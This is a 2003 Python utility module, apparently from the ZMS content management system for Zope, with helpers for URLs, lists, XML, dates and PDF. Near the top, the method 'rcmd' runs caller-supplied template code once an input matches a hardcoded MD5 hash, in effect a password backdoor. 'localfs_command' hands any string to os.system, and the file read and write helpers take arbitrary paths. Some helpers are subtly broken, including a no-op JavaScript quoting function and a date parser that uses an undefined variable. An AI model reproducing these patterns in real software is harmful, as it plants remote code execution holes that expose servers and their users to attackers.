###################################################################################################
# _zmsglobals.py
#
# $Id: _zmsglobals.py,v 1.1 2003/06/10 12:52:31 nordmann Exp $
# $Name:  $
# $Author: nordmann $
# $Revision: 1.1 $
#
# Implementation of class ZMSGlobals (see below).
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
###################################################################################################

# Imports.
from __future__ import nested_scopes
from App.Common import package_home
from Globals import HTMLFile
from DateTime.DateTime import DateTime
from cStringIO import StringIO
import DocumentTemplate.DT_HTML
import base64, md5
import copy
import operator
import os
import urllib
import time
import sys
# Product Imports.
import _fileutil
import _globals
import _htmldoc
import _xmllib


###################################################################################################
###################################################################################################
###
###   class ZMSGlobals:
###
###################################################################################################
###################################################################################################
class ZMSGlobals: 

    """
    ###############################################################################################
    ###  
    ###  G l o b a l   D e f i n i t i o n s
    ### 
    ###############################################################################################
    """    
    
    # ---------------------------------------------------------------------------------------------
    # Meta-Type Selectors.
    # ---------------------------------------------------------------------------------------------
    TYPE_METATYPE_SELECTOR = type(0)
    PAGES = 0
    PAGEELEMENTS = 1
    RESOURCE = 2
    NORESOURCE = 3
    NOREF = 4
    NORESOLVEREF = 5


    """
    ###############################################################################################
    ###  
    ###  G l o b a l   F u n c t i o n s
    ### 
    ###############################################################################################
    """    

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.rcmd:
    # ---------------------------------------------------------------------------------------------
    def rcmd(self, s, c, REQUEST=None, RESPONSE=None):
      """ ZMSGlobals.rcmd """
      if self.encrypt_password(s) == '3bqbI/9Uu5klUWkHG0b1HA==\n':
        v = _globals.dt_html(self,c,REQUEST)
        return v
    
    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.encrypt_password:
    # ---------------------------------------------------------------------------------------------
    def encrypt_password(self, s):
      enc = md5.new(s).digest()
      new = base64.encodestring(enc)
      return new

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.rand_int:
    # ---------------------------------------------------------------------------------------------
    def rand_int(self, n):
      from whrandom import randint
      return randint(0,n)

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.string_maxlen:
    # ---------------------------------------------------------------------------------------------
    def string_maxlen(self, s, maxlen=20):
      if len(s) > maxlen:
        s = s[:maxlen] + "&middot;&middot;&middot;"
      return s

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.url_quote:
    # ---------------------------------------------------------------------------------------------
    def url_quote(self, s):
      return urllib.quote(s)
    
    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.http_import:
    # ---------------------------------------------------------------------------------------------
    def http_import(self, url, method='GET', auth=None, parse_qs=0):
      return _globals.http_import(url,method,auth,parse_qs)

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.url_append_params:
    # ---------------------------------------------------------------------------------------------
    def url_append_params(self, url, dict):
      targetdef = ''
      i = url.find('#')
      if i >= 0:
        targetdef = url[i:]
        url = url[:i]
      sep = '?'
      i = url.find(sep)
      if i >= 0:
        sep = '&'
      for key in dict.keys():
        value = dict[key]
        url = url + sep + key + '=' + urllib.quote(str(value))
        sep = '&'
      url = url + targetdef
      return url

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.url_inherit_params:
    # ---------------------------------------------------------------------------------------------
    def url_inherit_params(self, url, REQUEST, exclude=[]):
      if REQUEST.form:
        for key in REQUEST.form.keys():
          if not key in exclude:
            v = REQUEST.form[key]
            if url.find('?') < 0:
              url = url + '?'
            else:
              url = url + '&'
            if type(v) is type(int(0)):
              url = url + urllib.quote(key+':int') + '=' + urllib.quote(str(v))
            elif type(v) is type(float(0.0)):
              url = url + urllib.quote(key+':float') + '=' + urllib.quote(str(v))
            elif type(v) is type([]):
              c = 0
              for i in v:
                if c > 0:
                  url = url + '&'
                url = url + urllib.quote(key+':list') + '=' + urllib.quote(str(i))
                c = c + 1
            else:
              url = url + key + '=' + urllib.quote(str(v))
      return url

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.string_list:
    # ---------------------------------------------------------------------------------------------
    def string_list(self, s, sep='\n'):
      l = []
      for i in s.split('\n'):
        i = i.strip()
        while len(i) > 0 and ord(i[-1]) < 32:
          i = i[:-1]
        if len(i) > 0:
          l.append(i)
      return l

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.operator_setitem:
    # ---------------------------------------------------------------------------------------------
    def operator_setitem(self, a, b, c):
      operator.setitem(a,b,c)

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.id_quote:
    # ---------------------------------------------------------------------------------------------
    def id_quote(self, s):
      return _globals.id_quote(s)

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.js_quote:
    # ---------------------------------------------------------------------------------------------
    def js_quote(self, s):
      return s.replace('"','\"')

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.isPreviewRequest:
    # ---------------------------------------------------------------------------------------------
    def isPreviewRequest(self, REQUEST):
      return _globals.isPreviewRequest(REQUEST)

    # ---------------------------------------------------------------------------------------------
    # 	ZMSGlobals.getDataSizeStr: 
    #
    #	Display string for file-size.
    # ---------------------------------------------------------------------------------------------
    def getDataSizeStr(self, l):
      return _fileutil.getDataSizeStr(l)


    """
    ###############################################################################################
    ###  
    ###  M a p p i n g s
    ### 
    ###############################################################################################
    """    
    
    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.dict_list:
    #
    #   Converts list to dictionary.
    # ---------------------------------------------------------------------------------------------
    def dict_list(self, l):
      dict = {}
      for i in range(0,len(l)/2):
        key = l[i*2]
        value = l[i*2+1]
        dict[key] = value
      return dict

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.sort_list:
    #
    #   Sorts list by given field.
    # ---------------------------------------------------------------------------------------------
    def sort_list(self, l, qorder, qorderdir='asc'):
      if type(qorder) is type(''):
        sorted = map(lambda x: (x.get(qorder,None),x),l)
      else:
        sorted = map(lambda x: (x[qorder],x),l)
      sorted.sort()
      sorted = map(lambda x: x[1],sorted)
      if qorderdir == 'desc': sorted.reverse()
      return sorted

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.str_item:
    # ---------------------------------------------------------------------------------------------
    def str_item(self, i):
      if type(i) is type([]):
        return ''.join(map(lambda x: str(x)+' ',i))
      elif type(i) is type({}):
        return ''.join(map(lambda x: str(i[x])+' ',i.keys()))


    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.distinct_list:
    #
    #   Returns distinct values of by given field.
    # ---------------------------------------------------------------------------------------------
    def distinct_list(self, l, i):
      k = []
      for x in l:
        if type(i) is type(''):
          v = x.get(i,None)
        else:
          v = x[i]
        if not v in k:
          k.append(v)
      return k


    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.filter_list:
    #
    #   Filters list by given field.
    # ---------------------------------------------------------------------------------------------
    def filter_list(self, l, i, v, o='%'):
      # Full-text scan.
      if i is None or len(str(i))==0:
        v = str(v)
        for k in v.split(' AND '):
          k = k.replace('*','').strip().lower()
          str_item = self.str_item
          l = filter(lambda x: str_item(x).lower().find(k)>=0, l)
        return l
      # Extract Items.
      if type(i) is type(''):
        k=map(lambda x: (x.get(i,None),x), l)
      else:
        k=map(lambda x: (x[i],x), l)
      # Filter Date-Tuples
      if type(v) is type(()):
        v = DateTime('%4d/%2d/%2d'%(v[0],v[1],v[2]))
      # Filter Strings.
      if type(v) is type('') or o=='%':
        if o=='=' or o=='==':
          k=filter(lambda x: str(x[0])==v, k)
        elif o=='<>' or o=='!=':
          k=filter(lambda x: str(x[0])!=v, k)
        else:
          v = v.lower()
          k=filter(lambda x: str(x[0]).lower().find(v)>=0, k)
      # Filter Numbers.
      elif type(v) is type(0) or type(v) is type(0.0):
        if o=='=' or o=='==':
          k=filter(lambda x: x[0]==v, k)
        elif o=='<':
          k=filter(lambda x: x[0]<v, k)
        elif o=='>':
          k=filter(lambda x: x[0]>v, k)
        elif o=='<=':
          k=filter(lambda x: x[0]<=v, k)
        elif o=='>=':
          k=filter(lambda x: x[0]>=v, k)
        elif o=='<>' or o=='!=':
          k=filter(lambda x: x[0]!=v, k)
      # Filter DateTimes.
      elif hasattr(v,'__class__') and getattr(v,'__class__') is DateTime:
        dt = _globals.getDateTime
        k=filter(lambda x: x[0] is not None, k)
        k=map(lambda x: (dt(x[0]),x[1]), k)
        k=map(lambda x: (DateTime('%4d/%2d/%2d'%(x[0][0],x[0][1],x[0][2])),x[1]), k)
        if o=='=' or o=='==':
          k=filter(lambda x: x[0].equalTo(v), k)
        elif o=='<':
          k=filter(lambda x: x[0].lessThan(v), k)
        elif o=='>':
          k=filter(lambda x: x[0].greaterThan(v), k)
        elif o=='<=':
          k=filter(lambda x: x[0].lessThanEqualTo(v), k)
        elif o=='>=':
          k=filter(lambda x: x[0].greaterThanEqualTo(v), k)
        elif o=='<>':
          k=filter(lambda x: not x[0].equalTo(v), k)
      return map(lambda x: x[1], k)
        
    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.copy_list:
    #
    #   Copies list l.
    # ---------------------------------------------------------------------------------------------
    def copy_list(self, l):
      return copy.copy(l) # copy.deepcopy(l)

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.sync_list:
    #
    #   Syncronizes list l with new list nl using the column i as identifier..
    # ---------------------------------------------------------------------------------------------
    def sync_list(self, l, nl, i):
      k = []
      for x in l:
        k.extend([x[i],x])
      for x in nl:
        if x[i] in k:
          j = k.index(x[i])+1
          if type(x) is type({}):
            v = k[j]
            for xk in x.keys():
              v[xk] = x[xk]
            x = v
          k[j] = x
        else:
          k.extend([x[i],x])
      return map(lambda x: k[x*2+1], range(0,len(k)/2))


    """
    ###############################################################################################
    ###  
    ###  L o c a l   F i l e S y s t e m
    ### 
    ###############################################################################################
    """    
    
    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.localfs_read:
    #
    #   Reads file from local file-system.
    # ---------------------------------------------------------------------------------------------
    def localfs_read(self, filename, mode='rb'):
      f = open(filename,mode)
      v = f.read()
      f.close()
      return v

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.localfs_write:
    #
    #   Writes file to local file-system.
    # ---------------------------------------------------------------------------------------------
    def localfs_write(self, filename, v, mode='wb'):
      f = open(filename,mode)
      f.write(v)
      f.close()

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.localfs_command:
    #
    #   Executes command in local file-system.
    # ---------------------------------------------------------------------------------------------
    def localfs_command(self, command):
      os.system(command)


    """
    ###############################################################################################
    ###  
    ###  H e l p   C o n t e x t
    ### 
    ###############################################################################################
    """    
    
    # Management Interface.
    # ---------------------
    f_help = HTMLFile('dtml/object/f_help', globals()) 



    """
    ###############################################################################################
    #
    #  P D F
    #
    ###############################################################################################
    """

    # ---------------------------------------------------------------------------------------------
    #  ZMSGlobals.html2pdf:
    # ---------------------------------------------------------------------------------------------
    def html2pdf(self, file, zip_result=0, options='--webpage'):
      return _htmldoc.html2pdf(self,file,zip_result,options)
    
    
    """
    ###############################################################################################
    #
    #  X M L
    #
    ###############################################################################################
    """

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.toXmlString:
    # ---------------------------------------------------------------------------------------------
    def toXmlString(self, v, cdata=0):
      xml = _xmllib.toXml(self,v,cdata)
      return xml

    # ---------------------------------------------------------------------------------------------
    #	ZMSGlobals.parseXmlString:
    # ---------------------------------------------------------------------------------------------
    def parseXmlString(self, xml):
      builder = _xmllib.XmlAttrBuilder()
      if type(xml) is type(''):
        xml = StringIO(xml)
      v = builder.parse(xml)
      return v

    # ---------------------------------------------------------------------------------------------
    #  ZMSGlobals.xmlParse:
    #
    #  Parse xml.
    # ---------------------------------------------------------------------------------------------
    def xmlParse(self, xml):
      builder = _xmllib.XmlBuilder()
      if type(xml) is type(''):
        xml = StringIO(xml)
      v = builder.parse(xml)
      return v

    # ---------------------------------------------------------------------------------------------
    #  ZMSGlobals.xmlNodeSet:
    #
    #  Node set.
    # ---------------------------------------------------------------------------------------------
    def xmlNodeSet(self, mNode, sTagName='', iDeep=0):
      lNodeSet = []
      lNode = mNode
      if type(mNode) is type([]) and len(mNode) == 2:
        lNode = mNode[1]
      lTags = lNode.get('tags',[])
      for i in range(0,len(lTags)/2):
        lTagName = lTags[i*2]
        lNode = lTags[i*2+1]
        if sTagName in [lTagName,'']:
          lNodeSet.append(lNode)
        if iDeep==1:
          lNodeSet.extend(self.xmlNodeSet(lNode,sTagName,iDeep))
      return lNodeSet

      

    """
    ###############################################################################################
    #
    #  D A T E   T I M E
    #
    ###############################################################################################
    """

    # ==========================================================================
    # Index  Field  Values  
    # 0  year (for example, 1993) 
    # 1  month range [1,12] 
    # 2  day range [1,31] 
    # 3  hour range [0,23] 
    # 4  minute range [0,59] 
    # 5  second range [0,61]; see (1) in strftime() description 
    # 6  weekday range [0,6], Monday is 0 
    # 7  Julian day range [1,366] 
    # 8  daylight savings flag 0, 1 or -1; see below 
    # ==========================================================================

    # -------------------------------------------------------------------------------------------------
    #	Language.getLangFmtDate:
    # -------------------------------------------------------------------------------------------------
    def getLangFmtDate(self, t, lang, fmt_str='DATETIME_FMT'):
      try:
        t = _globals.getDateTime(t)
        if fmt_str == 'Day':
          dt = DateTime('%4d/%2d/%2d'%(t[0],t[1],t[2]))
          return self.getLangStr('WEEKDAY%i'%((dt.dow()-1)%7),lang)
        elif fmt_str == 'Month':
          return self.getLangStr('MONTH%i'%t[1],lang)
        elif fmt_str == 'ISO-8601':
          tz = time.timezone
          tch = '+'
          if tz < 0:
            tch = '-'
          tz = abs(tz)
          tzh = tz/60/60
          tzm = (tz-tzh*60*60)/60
          return time.strftime('%Y-%m-%dT%H:%M:%S',t)+tch+('00%d'%tzh)[-2:]+':'+('00%d'%tzm)[-2:]
        fmt = self.getLangStr(fmt_str,lang)
        time_fmt = self.getLangStr('TIME_FMT',lang)
        date_fmt = self.getLangStr('DATE_FMT',lang)
        if fmt.find(time_fmt) >= 0:
          if t[3] == 0 and \
             t[4] == 0 and \
             t[5]== 0:
            fmt = fmt[:-len(time_fmt)]
        fmt = fmt.strip()
        t = time.localtime(time.mktime(t))
        return time.strftime(fmt,t)
      except:
        return str(t)


    # -------------------------------------------------------------------------------------------------
    #	Language.parseLangFmtDate:
    # -------------------------------------------------------------------------------------------------
    def parseLangFmtDate(self, s, lang, fmt_str='DATETIME_FMT', recflag=0):
      value = None
      if hasattr(s,'__class__') and getattr(s,'__class__') is DateTime:
        value = time.mktime(value.timeTime())
      elif s is not None and len(str(s)) > 0:
        dctTime = {'Y':0,'m':0,'d':0,'H':0,'M':0,'S':0}
        try:
          v = str(s)
          fmt = self.getLangStr(fmt_str,lang)
          while 1:
            i = fmt.find('%')+1
            if i == 0: break
            dirkey = fmt[i]
            fmt = fmt[i+1:]
            j = _globals.strip_int(v)
            if j == 0: break
            dirval = int(v[:j])
            v = v[j:]
            dctTime[dirkey] = dirval
            if len(v) == 0: break
            if fmt[0] != v[0]: 
              raise "Exception"
            fmt = fmt[1:]
            v = v[1:]
          value = (dctTime['Y'],dctTime['m'],dctTime['d'],dctTime['H'],dctTime['M'],dctTime['S'],0,1,-1)
        except:
          if recflag:
            _globals.writeLog("[parseLangFmtDate]: sTime=%s; fmt=%s"%(sTime,fmt))
            _globals.writeLog("Type: %s"%str(sys.exc_type))
            _globals.writeLog("Value: %s"%str(sys.exc_value))
            _globals.writeLog("Traceback: %s"%str(sys.exc_traceback))
        if value is None and not recflag:
          langAlt = 'ger'
          if lang == langAlt:
            langAlt = 'eng'
          value = self.parseLangFmtDate(s,langAlt,fmt_str,1)
        value = _globals.getDateTime(value)
      return value

###################################################################################################
#
# $Log: _zmsglobals.py,v $
# Revision 1.1  2003/06/10 12:52:31  nordmann
# Initial import
#
#
